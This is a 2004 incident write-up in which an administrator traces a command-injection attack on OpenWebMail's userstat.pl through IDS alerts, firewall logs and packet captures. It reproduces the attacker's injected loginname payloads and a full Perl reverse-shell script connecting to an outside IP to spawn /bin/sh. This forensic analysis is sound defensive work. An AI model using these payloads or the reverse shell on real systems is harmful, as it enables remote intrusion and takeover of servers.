Last Updated: Tuesday August 24, 2004
Michael Ligh ([email protected])
Let's start from the beginning. Between midnight and 3 AM on 8/18/2004, some traffic flowing from client to server tripped 3 IDS alerts (2 unique). The rules were so:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS perl execution attempt"; flow:to_server,established; content:"perl%20"; nocase; classtype:web-application-attack; sid:1356; rev:5;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS perl execution attempt"; flow:to_server,established; content:"perl%20"; nocase; classtype:web-application-attack; sid:1356; rev:5;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS rm command attempt"; flow:to_server,established; content:"rm%20"; nocase; classtype:web-application-attack; sid:1365; rev:5;)
You can see an attempt was made from one address as early as midnight. The second set of alerts came from another source address almost 3 hours later.It was unfortunate, but not surprising to dig up the payload contents of the packets that set off those alerts. Here are the HTTP headers:
POST /cgi-bin/openwebmail/userstat.pl HTTP/1.1.. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: mnin.ods.org Pragma: no-cache Connection: close Content-Length: 2143 Content-Type: application/x-www-form-urlencoded
And then follows the unicode encoded parameters:
...loginname=2%3E /dev/null%3Bperl %20-e%20%22print %20%5C%22%5C043%...
A bunch of junk, huh? What this first packet did was submit a perl script to an executable openwebmail component named userstat.pl, which does no bounds checking on its input data. It is a known vulnerability that has since been patched by the authors, however the version on my server was not updated.
In particular, according to SecuriTeam, [1] "the script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands."
There are several other advisories online and even more example exploit scripts. In this case, it is pretty clear what was used to generate the attack (gwee), based on the payload contents of the packet that set off the 3rd IDS alert:
loginname=2%3E/d ev/null%3Brm%20% 2Df%20/var/tmp/. vetx.95
Or translated:
loginname=2>/dev/null; rm -f /var/tmp/vetx.95
This is the output redirector part of the command being fed to userstat.pl. Finding this packet was my clue to check if /var/tmp/vetx.95 resided on the filesystem, still uncertain if this was a false positive or not. Things unfolded when I mistyped the path and ended up printing the directory listing for /tmp instead of /var/tmp. I found an executable perl script named w00t that contained socket code to connect back to the attacker's system on ports 999 and 7700 and spawn a shell. It looked like this:
#!/usr/bin/perl use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp'); socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(999 ,inet_aton("202.130.135.153" )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); dup2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";
It was now fact that an attacker had definitely exploited something in order to write a file to the /tmp directory of the disk. At this point it was still an uncertainty exactly what was exploited and if the file was executed or not. That changed fast as soon as I viewed the egress filtering logs. The script was indeed executed as evidenced by the following dropped traffic:
Aug 18 00:00:36 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60196 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 00:00:39 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60198 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 00:00:45 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60241 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 00:00:57 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60243 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 00:01:21 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60307 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 00:02:09 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=61281 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 02:46:04 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64581 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 02:46:07 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64582 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 02:46:13 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64591 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 02:46:25 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64592 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 02:46:49 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64593 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0 Aug 18 02:47:37 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64629 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Fortunately the attacker was never allowed to get the backdoor up and running due to the outbound filtering in place. If that ever changes, you might see 'investigating my own hacked system part II'. Anyway, I mentioned earlier that a program named Gwee, [2] was probably responsible ffor the attack, based on a keyword found in the second packet. The file named vetx.95 is associated with gwee, as found in its man page:
-T /var/tmp/.vetx.95 Choose a different temporary filename for the shellcode/backdoor on the target than the default.
It would make even more sense that gwee stands for General Web Exploitation Engine, described by its authors as "a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc".
Conveniently, there is a pre-written script especially for OpenWebMail's vulnerable userstat.pl, [3]. That is pretty much a wrap on this incident. Hopefully it won't happen again, but if it does, I'll have fun writing about it.
ii. The Second Gwee Episode: Packet Captures
Just for verification and log correlation, here is the whole attempt over again. Why, all the sudden, would this attack which has existed for over a year, become so common? Thanks to Matt, there is at least one rational explanation. Search engines indexing a web site have records of pages and content. When people want to try an exploit, they no longer have to guess what domains host particular files - they can just Google them!
Here are the Apache (cough, cough, I mean the web server thats not Apache's) access logs:
62.111.240.132 - - [13/Sep/2004:15:05:30 -0400] "POST /cgi-bin/openwebmail/userstat.pl HTTP/1.1" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 62.111.240.132 - - [13/Sep/2004:15:05:39 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 62.111.240.132 - - [13/Sep/2004:15:05:47 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Here we go, all the way until the end:
09/13-15:05:30.458245 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:1298 IpLen:20 DgmLen:60 DF ******S* Seq: 0x899ACEB2 Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 763022240 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:30.458367 10.1.1.100:80 -> 62.111.240.132:36368 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x24126FEB Ack: 0x899ACEB3 Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 1991961816 763022240 TCP Options => NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:30.619452 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:1299 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x899ACEB3 Ack: 0x24126FEC Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763022259 1991961816 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:30.645368 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:1300 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x899ACEB3 Ack: 0x24126FEC Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763022259 1991961816 50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 POST /cgi-bin/op 65 6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 enwebmail/userst 61 74 2E 70 6C 20 48 54 54 50 2F 31 2E 31 0D 0A at.pl HTTP/1.1.. 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Agent: Mozi 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 lla/4.0 (compati 62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 ble; MSIE 6.0; W 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 29 0D 0A indows NT 5.1).. 48 6F 73 74 3A 20 32 34 2E 32 2E 31 35 33 2E 31 Host: 24.2.153.1 36 38 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F 2D 63 68..Pragma: no-c 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E ache..Connection 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74 : close..Content 2D 4C 65 6E 67 74 68 3A 20 32 31 34 33 0D 0A 43 -Length: 2143..C 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 ontent-Type: app 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 lication/x-www-f 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A orm-urlencoded.. 0D 0A 6C 6F 67 69 6E 6E 61 6D 65 3D 32 25 33 45 ..loginname=2%3E 2F 64 65 76 2F 6E 75 6C 6C 25 33 42 70 65 72 6C /dev/null%3Bperl 25 32 30 2D 65 25 32 30 25 32 32 70 72 69 6E 74 %20-e%20%22print 25 32 30 25 35 43 25 32 32 25 35 43 30 34 33 25 %20%5C%22%5C043% 35 43 30 34 31 25 35 43 30 35 37 25 35 43 31 36 5C041%5C057%5C16 35 25 35 43 31 36 33 25 35 43 31 36 32 25 35 43 5%5C163%5C162%5C 30 35 37 25 35 43 31 34 32 25 35 43 31 35 31 25 057%5C142%5C151% 35 43 31 35 36 25 35 43 30 35 37 25 35 43 31 36 5C156%5C057%5C16 30 25 35 43 31 34 35 25 35 43 31 36 32 25 35 43 0%5C145%5C162%5C 31 35 34 25 35 43 30 31 32 25 35 43 31 36 35 25 154%5C012%5C165% 35 43 31 36 33 25 35 43 31 34 35 25 35 43 30 34 5C163%5C145%5C04 30 25 35 43 31 32 33 25 35 43 31 35 37 25 35 43 0%5C123%5C157%5C 31 34 33 25 35 43 31 35 33 25 35 43 31 34 35 25 143%5C153%5C145% 35 43 31 36 34 25 35 43 30 37 33 25 35 43 30 34 5C164%5C073%5C04 30 25 35 43 31 36 35 25 35 43 31 36 33 25 35 43 0%5C165%5C163%5C 31 34 35 25 35 43 30 34 30 25 35 43 31 31 31 25 145%5C040%5C111% 35 43 31 31 37 25 35 43 30 37 32 25 35 43 30 37 5C117%5C072%5C07 32 25 35 43 31 31 30 25 35 43 31 34 31 25 35 43 2%5C110%5C141%5C 31 35 36 25 35 43 31 34 34 25 35 43 31 35 34 25 156%5C144%5C154% 35 43 31 34 35 25 35 43 30 37 33 25 35 43 30 34 5C145%5C073%5C04 30 25 35 43 31 36 35 25 35 43 31 36 33 25 35 43 0%5C165%5C163%5C 31 34 35 25 35 43 30 34 30 25 35 43 31 32 30 25 145%5C040%5C120% 35 43 31 31 37 25 35 43 31 32 33 25 35 43 31 31 5C117%5C123%5C11 31 25 35 43 31 33 30 25 35 43 30 37 33 25 35 43 1%5C130%5C073%5C 30 34 30 25 35 43 30 34 34 25 35 43 31 36 30 25 040%5C044%5C160% 35 43 31 36 32 25 35 43 31 35 37 25 35 43 31 36 5C162%5C157%5C16 34 25 35 43 31 35 37 25 35 43 30 34 30 25 35 43 4%5C157%5C040%5C 30 37 35 25 35 43 30 34 30 25 35 43 31 34 37 25 075%5C040%5C147% 35 43 31 34 35 25 35 43 31 36 34 25 35 43 31 36 5C145%5C164%5C16 30 25 35 43 31 36 32 25 35 43 31 35 37 25 35 43 0%5C162%5C157%5C 31 36 34 25 35 43 31 35 37 25 35 43 31 34 32 25 164%5C157%5C142% 35 43 31 37 31 25 35 43 31 35 36 25 35 43 31 34 5C171%5C156%5C14 31 25 35 43 31 35 35 25 35 43 31 34 35 25 35 43 1%5C155%5C145%5C 30 35 30 25 35 43 30 34 37 25 35 43 31 36 34 25 050%5C047%5C164% 35 43 31 34 33 25 35 43 31 36 30 25 35 43 30 34 5C143%5C160%5C04 37 25 35 43 30 35 31 25 35 43 30 37 33 25 35 43 7%5C051%5C073%5C 30 34 30 25 35 43 31 36 33 25 35 43 31 35 37 25 040%5C163%5C157% 35 43 31 34 33 25 35 43 31 35 33 25 35 43 31 34 5C143%5C153%5C14 35 25 35 43 31 36 34 25 35 43 30 35 30 25 35 43 5%5C164%5C050%5C 31 32 33 25 35 43 31 35 37 25 35 43 31 34 33 25 123%5C157%5C143% 35 43 31 35 33 25 35 43 31 34 35 25 35 43 31 36 5C153%5C145%5C16 34 25 35 43 31 33 37 25 35 43 31 31 30 25 35 43 4%5C137%5C110%5C 31 34 31 25 35 43 31 35 36 25 35 43 31 34 34 25 141%5C156%5C144% 35 43 31 35 34 25 35 43 31 34 35 25 35 43 30 35 5C154%5C145%5C05 34 25 35 43 30 34 30 25 35 43 31 30 31 25 35 43 4%5C040%5C101%5C 31 30 36 25 35 43 31 33 37 25 35 43 31 31 31 25 106%5C137%5C111% 35 43 31 31 36 25 35 43 31 30 35 25 35 43 31 32 5C116%5C105%5C12 34 25 35 43 30 35 34 25 35 43 30 34 30 25 35 43 4%5C054%5C040%5C 31 32 33 25 35 43 31 31 37 25 35 43 31 30 33 25 123%5C117%5C103% 35 43 31 31 33 25 35 43 31 33 37 25 35 43 31 32 5C113%5C137%5C12 33 25 35 43 31 32 34 25 35 43 31 32 32 25 35 43 3%5C124%5C122%5C 31 30 35 25 35 43 31 30 31 25 35 43 31 31 35 25 105%5C101%5C115% 35 43 30 35 34 25 35 43 30 34 30 25 35 43 30 34 5C054%5C040%5C04 34 25 35 43 31 36 30 25 35 43 31 36 32 25 35 43 4%5C160%5C162%5C 31 35 37 25 35 43 31 36 34 25 35 43 31 35 37 25 157%5C164%5C157% 35 43 30 35 31 25 35 43 30 37 33 25 35 43 30 34 5C051%5C073%5C04 30 25 35 43 30 34 34 25 35 43 31 36 33 25 35 43 0%5C044%5C163%5C 31 35 31 25 35 43 31 35 36 25 35 43 30 34 30 25 151%5C156%5C040% 35 43 30 37 35 25 35 43 30 34 30 25 35 43 31 36 5C075%5C040%5C16 33 25 35 43 31 35 37 25 35 43 31 34 33 25 35 43 3%5C157%5C143%5C 31 35 33 25 35 43 31 34 31 25 35 43 31 34 34 25 153%5C141%5C144% 35 43 31 34 34 25 35 43 31 36 32 25 35 43 31 33 5C144%5C162%5C13 37 25 35 43 31 35 31 25 35 43 31 35 36 25 35 43 7%5C151%5C156%5C 30 35 30 25 35 43 30 37 30 25 35 43 30 36 30 25 050%5C070%5C060% 35 43 30 37 30 25 35 43 30 36 30 25 35 43 30 34 5C070%5C060%5C04 30 25 35 43 30 35 34 25 35 43 31 35 31 25 35 43 0%5C054%5C151%5C 31 35 36 25 35 43 31 34 35 25 35 43 31 36 34 25 156%5C145%5C164% 35 43 31 33 37 25 35 43 31 34 31 25 35 43 31 36 5C137%5C141%5C16 34 25 35 43 31 35 37 25 35 43 31 35 36 25 35 43 4%5C157%5C156%5C 30 35 30 25 35 43 30 34 32 25 35 43 30 36 36 25 050%5C042%5C066% 35 43 30 36 32 25 35 43 30 35 36 25 35 43 30 36 5C062%5C056%5C06 31 25 35 43 30 36 31 25 35 43 30 36 31 25 35 43 1%5C061%5C061%5C 30 35 36 25 35 43 30 36 32 25 35 43 30 36 34 25 056%5C062%5C064% 35 43 30 36 30 25 35 43 30 35 36 25 35 43 30 36 5C060%5C056%5C06 31 25 35 43 30 36 33 25 35 43 30 36 30 25 35 43 1%5C063%5C060%5C 30 34 32 25 35 43 30 34 042%5C04 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:30.645406 10.1.1.100:80 -> 62.111.240.132:36368 TCP TTL:64 TOS:0x0 ID:33429 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x24126FEC Ack: 0x899AD45B Win: 0x21F0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991962003 763022259 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:30.660420 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:1301 IpLen:20 DgmLen:993 DF ***AP*** Seq: 0x899AD45B Ack: 0x24126FEC Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763022259 1991961816 30 25 35 43 30 35 31 25 35 43 30 35 31 25 35 43 0%5C051%5C051%5C 30 37 33 25 35 43 30 34 30 25 35 43 31 34 33 25 073%5C040%5C143% 35 43 31 35 37 25 35 43 31 35 36 25 35 43 31 35 5C157%5C156%5C15 36 25 35 43 31 34 35 25 35 43 31 34 33 25 35 43 6%5C145%5C143%5C 31 36 34 25 35 43 30 35 30 25 35 43 31 32 33 25 164%5C050%5C123% 35 43 31 35 37 25 35 43 31 34 33 25 35 43 31 35 5C157%5C143%5C15 33 25 35 43 31 34 35 25 35 43 31 36 34 25 35 43 3%5C145%5C164%5C 31 33 37 25 35 43 31 31 30 25 35 43 31 34 31 25 137%5C110%5C141% 35 43 31 35 36 25 35 43 31 34 34 25 35 43 31 35 5C156%5C144%5C15 34 25 35 43 31 34 35 25 35 43 30 35 34 25 35 43 4%5C145%5C054%5C 30 34 34 25 35 43 31 36 33 25 35 43 31 35 31 25 044%5C163%5C151% 35 43 31 35 36 25 35 43 30 35 31 25 35 43 30 37 5C156%5C051%5C07 33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43 3%5C040%5C144%5C 31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25 165%5C160%5C062% 35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35 5C050%5C123%5C15 37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43 7%5C143%5C153%5C 31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25 145%5C164%5C137% 35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35 5C110%5C141%5C15 36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43 6%5C144%5C154%5C 31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25 145%5C055%5C076% 35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35 5C146%5C151%5C15 34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43 4%5C145%5C156%5C 31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25 157%5C054%5C040% 35 43 30 36 30 25 35 43 30 35 31 25 35 43 30 37 5C060%5C051%5C07 33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43 3%5C040%5C144%5C 31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25 165%5C160%5C062% 35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35 5C050%5C123%5C15 37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43 7%5C143%5C153%5C 31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25 145%5C164%5C137% 35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35 5C110%5C141%5C15 36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43 6%5C144%5C154%5C 31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25 145%5C055%5C076% 35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35 5C146%5C151%5C15 34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43 4%5C145%5C156%5C 31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25 157%5C054%5C040% 35 43 30 36 31 25 35 43 30 35 31 25 35 43 30 37 5C061%5C051%5C07 33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43 3%5C040%5C144%5C 31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25 165%5C160%5C062% 35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35 5C050%5C123%5C15 37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43 7%5C143%5C153%5C 31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25 145%5C164%5C137% 35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35 5C110%5C141%5C15 36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43 6%5C144%5C154%5C 31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25 145%5C055%5C076% 35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35 5C146%5C151%5C15 34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43 4%5C145%5C156%5C 31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25 157%5C054%5C040% 35 43 30 36 32 25 35 43 30 35 31 25 35 43 30 37 5C062%5C051%5C07 33 25 35 43 30 34 30 25 35 43 31 34 35 25 35 43 3%5C040%5C145%5C 31 37 30 25 35 43 31 34 35 25 35 43 31 34 33 25 170%5C145%5C143% 35 43 30 34 30 25 35 43 31 37 33 25 35 43 30 34 5C040%5C173%5C04 30 25 35 43 30 34 32 25 35 43 30 35 37 25 35 43 0%5C042%5C057%5C 31 34 32 25 35 43 31 35 31 25 35 43 31 35 36 25 142%5C151%5C156% 35 43 30 35 37 25 35 43 31 36 33 25 35 43 31 35 5C057%5C163%5C15 30 25 35 43 30 34 32 25 35 43 30 34 30 25 35 43 0%5C042%5C040%5C 31 37 35 25 35 43 30 34 30 25 35 43 30 34 32 25 175%5C040%5C042% 35 43 30 34 32 25 35 43 30 37 33 25 35 43 30 31 5C042%5C073%5C01 32 25 35 43 25 32 32 25 32 32 25 32 30 25 33 45 2%5C%22%22%20%3E 2F 74 6D 70 2F 77 30 30 74 0D 0A 0D 0A /tmp/w00t.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:30.660441 10.1.1.100:80 -> 62.111.240.132:36368 TCP TTL:64 TOS:0x0 ID:33430 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x24126FEC Ack: 0x899AD808 Win: 0x2D40 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991962018 763022259 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.740509 10.1.1.100:80 -> 62.111.240.132:36368 TCP TTL:64 TOS:0x0 ID:33431 IpLen:20 DgmLen:271 DF ***AP*** Seq: 0x24126FEC Ack: 0x899AD808 Win: 0x2D40 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991970099 763022259 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53 .Date: Mon, 13 S 65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 33 30 ep 2004 19:05:30 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap 61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F ache..Pragma: no 2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F -cache..Cache-co 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C ntrol: no-cache, 6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 6E 65 63 no-store..Connec 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 54 72 61 tion: close..Tra 6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A 20 nsfer-Encoding: 63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74 65 6E 74 chunked..Content 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 -Type: applicati 6F 6E 2F 78 2D 6A 61 76 61 73 63 72 69 70 74 0D on/x-javascript. 0A 0D 0A 33 0D 0A 2F 2F 0A 0D 0A ...3..//... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.741406 10.1.1.100:80 -> 62.111.240.132:36368 TCP TTL:64 TOS:0x0 ID:33432 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0x241270C7 Ack: 0x899AD808 Win: 0x2D40 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991970100 763022259 30 0D 0A 0D 0A 0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.741557 10.1.1.100:80 -> 62.111.240.132:36368 TCP TTL:64 TOS:0x0 ID:33433 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x241270CC Ack: 0x899AD808 Win: 0x2D40 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991970100 763022259 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.900218 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:1302 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x899AD808 Ack: 0x241270C7 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023086 1991970099 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.901170 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:1303 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0x899AD808 Ack: 0x241270C7 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023086 1991970099 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.903687 62.111.240.132:36369 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:3243 IpLen:20 DgmLen:60 DF ******S* Seq: 0x8A5FC245 Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 763023086 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.903727 10.1.1.100:80 -> 62.111.240.132:36369 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x24D38330 Ack: 0x8A5FC246 Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 1991970262 763023086 TCP Options => NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.907726 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF *****R** Seq: 0x899AD808 Ack: 0x0 Win: 0x0 TcpLen: 20 